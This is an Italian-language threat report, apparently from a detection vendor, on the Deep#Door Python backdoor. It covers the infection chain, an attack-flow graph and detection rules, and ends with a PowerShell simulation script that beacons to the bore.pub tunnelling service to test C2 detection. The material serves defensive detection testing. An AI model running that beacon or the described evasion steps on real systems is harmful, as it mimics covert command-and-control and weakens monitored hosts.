Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il rapporto esamina Deep#Door, una backdoor furtiva basata su Python distribuita tramite un loader batch offuscato che incorpora e ricostruisce il suo payload dannoso in fase di esecuzione. Il malware utilizza un servizio di tunneling TCP pubblico per il command-and-control, configura diversi meccanismi di persistenza, indebolisce i controlli di sicurezza di Windows e supporta un’ampia attività di sorveglianza e furto di credenziali. Esegue anche controlli dettagliati dell’ambiente per sfuggire ai sandbox e agli analisti, mentre si affida al patching delle API in memoria per rimanere nascosto durante l’esecuzione.
Indagine
I ricercatori di Securonix hanno mappato l’intera catena d’infezione dallo script batch iniziale all’estrazione, ricostruzione ed esecuzione del payload finale Python RAT. La loro analisi ha identificato l’abuso di bore.pub per il tunneling, le porte generate dinamicamente e una sequenza di autenticazione personalizzata utilizzata per l’accesso degli operatori. Il rapporto ha inoltre dettagliato i metodi di elusione della difesa del malware, le tecniche di persistenza, le routine di scoperta del sistema e il comportamento di esfiltrazione dei dati.
Mitigazione
I difensori dovrebbero monitorare da vicino l’esecuzione degli script, abilitare il logging di PowerShell, rilevare modifiche non autorizzate alle impostazioni di Microsoft Defender e del firewall e controllare le voci di avvio, le chiavi Run e i relativi punti di persistenza. Anche il monitoraggio della rete dovrebbe focalizzarsi sulle connessioni in uscita verso bore.pub e attività su porte alte insolite. Strumenti EDR capaci di rilevare il patching delle API e la manomissione in memoria possono ulteriormente migliorare l’accesso a questa minaccia.
Risposta
Se viene rilevata un’attività di Deep#Door, isolare immediatamente l’endpoint interessato, terminare il processo Python dannoso, rimuovere tutti i meccanismi di persistenza, inclusi script di avvio, chiavi Run e sottoscrizioni WMI e ripristinare le impostazioni modificate di Defender e di logging. I team di sicurezza dovrebbero anche eseguire analisi forensi e della memoria per identificare eventuali impianti nascosti e valutare l’esposizione al furto di credenziali, bloccando contemporaneamente la comunicazione di rete verso bore.pub.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution["<b>Action</b> – <b>T1204 User Execution</b>: La vittima esegue il file batch dannoso install_obf.bat"] class action_user_execution action tool_batch_file["<b>Tool</b> – <b>Nome</b>: install_obf.bat<br/><b>Descrizione</b>: Script batch che avvia il loader"] class tool_batch_file tool action_obfuscation["<b>Action</b> – <b>T1027 File o Informazioni Offuscate</b>: Estrae il payload Python codificato base64/XOR (svc.py) tramite regex PowerShell autoriferenziato"] class action_obfuscation action tool_powershell["<b>Tool</b> – <b>Nome</b>: PowerShell<br/><b>Descrizione</b>: Utilizzato per analizzare il file batch e decodificare il payload incorporato"] class tool_powershell tool tool_python["<b>Tool</b> – <b>Nome</b>: Python<br/><b>Descrizione</b>: Esegue il payload svc.py decodificato"] class tool_python tool action_defense_evasion_disable["<b>Action</b> – <b>T1562.001 Disabilitare o Modificare Strumenti</b> / <b>T1562.004 Disabilitare o Modificare il Firewall di Sistema</b> / <b>T1562.008 Disabilitare o Modificare i Log del Cloud</b>: Disabilita Windows Defender, il logging di PowerShell, SmartScreen e il logging del firewall"] class action_defense_evasion_disable action tool_setmp["<b>Tool</b> – <b>Nome</b>: Set-MpPreference<br/><b>Descrizione</b>: Cmdlet di PowerShell per cambiare le impostazioni di Defender"] class tool_setmp tool tool_netsh["<b>Tool</b> – <b>Nome</b>: netsh advfirewall<br/><b>Descrizione</b>: Modifica le regole e i log del firewall di Windows"] class tool_netsh tool action_indicator_removal["<b>Action</b> – <b>T1070.001 Cancellare i Log degli Eventi di Windows</b> e <b>T1070.006 Timestomp</b>: Ferma e cancella i servizi EventLog/Sysmon e altera i timestamp dei file"] class action_indicator_removal action action_persistence_runkey["<b>Action</b> – <b>T1547.001 Chiavi Run del Registro/Cartella di Avvio</b> e <b>T1053 Attività/Job Programmato</b>: Lascia il file SystemServices.vbs nella cartella di Avvio, crea una chiave Run e un’attività programmata come fallback"] class action_persistence_runkey action tool_vbs_startup["<b>Tool</b> – <b>Nome</b>: SystemServices.vbs<br/><b>Descrizione</b>: Script VBS posizionato in %APPDATA%MicrosoftWindowsStart MenuProgramsStartup"] class tool_vbs_startup tool action_credential_access["<b>Action</b> – <b>T1003 Estrazione delle Credenziali di OS</b>, <b>T1552.004 Chiavi Private</b>, <b>T1552.001 Credenziali nei File</b>, <b>T1555 Archivi di Password</b>, <b>T1555.005 Gestori di Password</b>: Raccoglie password del browser, Windows Credential Manager, chiavi SSH, token cloud"] class action_credential_access action action_collection["<b>Action</b> – <b>T1056.001 Keylogging</b>, <b>T1113 Cattura Schermata</b>, <b>T1125 Acquisizione Video</b>, <b>T1123 Acquisizione Audio</b>, <b>T1115 Dati Appunti</b>: Cattura battute, screenshot, video della webcam, audio del microfono e appunti"] class action_collection action action_discovery["<b>Action</b> – <b>T1082 Scoperta Informazioni di Sistema</b>, <b>T1518 Scoperta Software</b>, <b>T1057 Scoperta Processi</b>, <b>T1046 Scoperta Servizi di Rete</b>, <b>T1018 Scoperta Sistema Remoto</b>, <b>T1526 Scoperta Servizi Cloud</b>: Raccoglie dati di configurazione di OS, hardware, software, processi, rete e cloud"] class action_discovery action action_defense_evasion_reflective["<b>Action</b> – <b>T1620 Caricamento Reflective Code</b> e <b>T1497.003 Elusione di Virtualizzazione/Sandbox: Basata su Tempo</b>: Rileva debugger, macchine virtuali e caratteristiche di sandbox e abortisce l’esecuzione"] class action_defense_evasion_reflective action action_c2_tunneling["<b>Action</b> – <b>T1572 Protocol Tunneling</b>: Stabilisce un tunnel criptato tramite il servizio pubblico bore.pub, esegue la scansione dinamica delle porte e l’autenticazione tramite risposta a sfida"] class action_c2_tunneling action action_exfiltration["<b>Action</b> – <b>T1041 Esfiltrazione Su Canale C2</b> e <b>T1048.002 Esfiltrazione tramite Protocollo Alternativo: Criptata Asimetricamente Senza C2</b>: Invia dati raccolti tramite il canale tunnellato"] class action_exfiltration action action_impact_forkbomb["<b>Action</b> – <b>T1499.002 Eccessiva Sollecitazione del Servizio</b>: Esegue una fork bomb per consumare le risorse di sistema"] class action_impact_forkbomb action %% Connections mostrando il flusso di attacco action_user_execution –>|esegue| tool_batch_file tool_batch_file –>|contiene| action_obfuscation action_obfuscation –>|utilizza| tool_powershell tool_powershell –>|decodifica e avvia| tool_python tool_python –>|esegue| action_defense_evasion_disable action_defense_evasion_disable –>|utilizza| tool_setmp action_defense_evasion_disable –>|utilizza| tool_netsh action_defense_evasion_disable –>|porta a| action_indicator_removal action_indicator_removal –>|precede| action_persistence_runkey action_persistence_runkey –>|rilascia| tool_vbs_startup action_persistence_runkey –>|abilita| action_credential_access action_credential_access –>|abilita| action_collection action_collection –>|fornisce dati a| action_discovery action_discovery –>|supporta| action_defense_evasion_reflective action_defense_evasion_reflective –>|stabilisce| action_c2_tunneling action_c2_tunneling –>|trasporta| action_exfiltration action_exfiltration –>|attiva| action_impact_forkbomb "
Flusso di Attacco
Rilevamenti
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registro_evento)
Visualizza
Stringhe Powershell Sospette (via cmdline)
Visualizza
.NET Classi/Metodi Sospetti Chiamati da Powershell CommandLine (via creazione_processo)
Visualizza
Possibile Scoperta Sistema Remoto o Controllo Connettività (via cmdline)
Visualizza
Possibile Enumerazione o Manipolazione Account o Gruppi (via cmdline)
Visualizza
Possibile Utilizzo di Timeout per Ritardare Esecuzione (via cmdline)
Visualizza
LOLBAS WScript / CScript (via creazione_processo)
Visualizza
Disabilitazione del Monitoraggio in Tempo Reale di Windows Defender e Altre Modifiche alle Preferenze (via cmdline)
Visualizza
Stringhe Powershell Sospette (via powershell)
Visualizza
Modifiche Sospette alle Preferenze di Windows Defender (via powershell)
Visualizza
Binary/Scripts Sospetti in Posizione di Avvio Automatico (via evento_file)
Visualizza
IOC (HashSha256) per rilevare: Deep#Door Stealer: Backdoor Python Furtiva e Credential Stealer che Sfrutta Tunneling, Persistenza Multi-Layer e Capacità di Sorveglianza in Memoria
Visualizza
Rileva Comunicazione C2 tramite Servizio di Tunneling TCP Pubblico [Connessione di Rete Windows]
Visualizza
Comando PowerShell per Estrarre il Payload Python Incorporato [PowerShell di Windows]
Visualizza
Rilevamento Distribuzione di Backdoor Python Furtiva Deep#Door [Creazione Processo Windows]
Visualizza
Rilevamento Uso del Servizio di Tunneling TCP Bore.pub per Comunicazioni C2 [Connessione di Rete Windows]
Visualizza
Monitoraggio in Tempo Reale e Monitoraggio Comportamentale di Windows Defender Disabilitati [PowerShell di Windows]
Visualizza
Esecuzione del Batch Script Offuscato di Deep#Door [Creazione Processo Windows]
Visualizza
Comando PowerShell che Disabilita Funzionalità di Windows Defender [PowerShell di Windows]
Visualizza
Rilevamento Esecuzione di Backdoor Python Furtiva Deep#Door [Creazione Processo Windows]
Visualizza
Rilevamento delle Comunicazioni C2 Furtive tramite bore.pub [Connessione di Rete Windows]
Visualizza
Rilevamento di Deep#Door Stealer Usando PowerShell e Manomissione del Firewall [PowerShell di Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Controllo Preventivo di Telemetria & Base Dati deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa di Attacco & Comandi:
Un attaccante che ha ottenuto un punto d’appoggio a basso privilegio sull’host Windows desidera stabilire un canale C2 furtivo utilizzando il servizio di
bore.pubtunneling impiegato da Deep#Door. Per mescolarsi con il traffico legittimo, l’attaccante seleziona una porta dall’intervallo 41.234-41.243 (scelta dal malware) e utilizza la classeSystem.Net.Sockets.TcpClientdi PowerShell per aprire una connessione TCP grezza. La connessione viene mantenuta inattiva per un breve periodo per imitare un battito cardiaco prima di trasmettere un piccolo segnale iniziale codificato in base-64. -
Script di Test di Regressione:
# Simula il segnale C2 di Deep#Door su bore.pub su una porta casuale all'interno dell'intervallo monitorato $domain = 'bore.pub' $port = Get-Random -Minimum 41234 -Maximum 41244 # Il limite superiore è esclusivo try { Write-Host "Connessione a $domain:$port ..." $client = New-Object System.Net.Sockets.TcpClient $client.Connect($domain, $port) $stream = $client.GetStream() # Payload minimo del segnale (p.e., un "ping" codificato in base64) $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0') $stream.Write($payload,0,$payload.Length) Write-Host "Segnale inviato. Mantenere la connessione per 5 secondi..." Start-Sleep -Seconds 5 } catch { Write-Error "Connessione fallita: $_" } finally { if ($stream) { $stream.Close() } if ($client) { $client.Close() } Write-Host "Connessione chiusa." } -
Comandi di Pulizia:
# Nessun artefatto persistente; assicurarsi che non vi siano connessioni TCP persistenti Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force } Write-Host "Pulizia completata."
Fine del Rapporto